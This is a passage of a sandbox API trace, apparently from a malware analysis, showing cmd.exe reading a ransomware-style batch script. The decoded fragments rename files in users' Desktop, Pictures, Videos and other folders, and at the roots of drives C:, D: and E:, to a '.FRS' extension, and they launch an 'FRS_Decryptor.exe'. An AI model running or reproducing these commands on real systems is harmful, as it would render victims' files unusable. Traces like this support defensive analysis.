out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0143.798] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0143.798] SetFilePointer (in: hFile=0x154, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0143.798] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0143.798] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0143.798] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.798] GetFileType (hFile=0x154) returned 0x1 [0143.798] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0143.798] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0143.798] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0143.798] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0143.798] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.798] GetFileType (hFile=0x154) returned 0x1 [0143.798] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0143.798] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0143.799] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.799] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.799] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.799] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.799] GetFileType (hFile=0x154) returned 0x1 [0143.799] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.799] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.799] SetFilePointer (in: hFile=0x154, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0143.799] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0143.799] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0143.799] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.799] GetFileType (hFile=0x154) returned 0x1 [0143.799] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0143.799] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.799] SetFilePointer (in: hFile=0x154, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0143.799] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0143.799] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0143.799] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.799] GetFileType (hFile=0x154) returned 0x1 [0143.799] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0143.799] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.799] SetFilePointer (in: hFile=0x154, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0143.799] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0143.799] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0143.800] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.800] GetFileType (hFile=0x154) returned 0x1 [0143.800] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0143.800] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.800] SetFilePointer (in: hFile=0x154, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0143.800] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0143.800] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0143.800] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.800] GetFileType (hFile=0x154) returned 0x1 [0143.800] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0143.800] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.800] SetFilePointer (in: hFile=0x154, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0143.800] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0143.800] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0143.800] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.800] GetFileType (hFile=0x154) returned 0x1 [0143.800] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0143.800] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.800] SetFilePointer (in: hFile=0x154, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0143.800] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0143.800] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0143.800] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.800] GetFileType (hFile=0x154) returned 0x1 [0143.800] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0143.801] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.801] SetFilePointer (in: hFile=0x154, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0143.801] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0143.801] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0143.801] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.801] GetFileType (hFile=0x154) returned 0x1 [0143.801] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0143.801] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.801] SetFilePointer (in: hFile=0x154, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0143.801] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0143.801] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0143.801] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.801] GetFileType (hFile=0x154) returned 0x1 [0143.801] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0143.801] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.801] SetFilePointer (in: hFile=0x154, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0143.801] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0143.801] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0143.801] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.801] GetFileType (hFile=0x154) returned 0x1 [0143.801] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0143.801] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.802] SetFilePointer (in: hFile=0x154, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0143.802] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0143.802] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0143.802] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.802] GetFileType (hFile=0x154) returned 0x1 [0143.802] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0143.802] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.802] SetFilePointer (in: hFile=0x154, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0143.802] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0143.802] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0143.802] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.802] GetFileType (hFile=0x154) returned 0x1 [0143.802] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0143.802] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.802] SetFilePointer (in: hFile=0x154, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0143.802] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0143.802] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0143.802] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.802] GetFileType (hFile=0x154) returned 0x1 [0143.802] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0143.802] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.802] SetFilePointer (in: hFile=0x154, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0143.802] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0143.803] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0143.803] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.803] GetFileType (hFile=0x154) returned 0x1 [0143.803] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0143.803] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.803] SetFilePointer (in: hFile=0x154, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0143.803] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0143.803] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0143.803] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.803] GetFileType (hFile=0x154) returned 0x1 [0143.803] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0143.803] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.803] SetFilePointer (in: hFile=0x154, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0143.803] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0143.803] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0143.803] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.803] GetFileType (hFile=0x154) returned 0x1 [0143.803] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0143.803] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.803] SetFilePointer (in: hFile=0x154, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0143.803] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0143.803] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0143.803] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.803] GetFileType (hFile=0x154) returned 0x1 [0143.804] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0143.804] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.804] SetFilePointer (in: hFile=0x154, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0143.804] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0143.804] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0143.804] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.804] GetFileType (hFile=0x154) returned 0x1 [0143.804] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0143.804] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.804] SetFilePointer (in: hFile=0x154, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0143.804] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0143.804] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0143.804] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.804] GetFileType (hFile=0x154) returned 0x1 [0143.804] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0143.804] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.804] SetFilePointer (in: hFile=0x154, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0143.804] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0143.804] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0143.804] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.804] GetFileType (hFile=0x154) returned 0x1 [0143.804] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0143.804] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.805] SetFilePointer (in: hFile=0x154, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0143.805] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0143.805] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0143.805] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.805] GetFileType (hFile=0x154) returned 0x1 [0143.805] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0143.805] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.805] SetFilePointer (in: hFile=0x154, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0143.805] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0143.805] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0143.805] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.805] GetFileType (hFile=0x154) returned 0x1 [0143.805] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 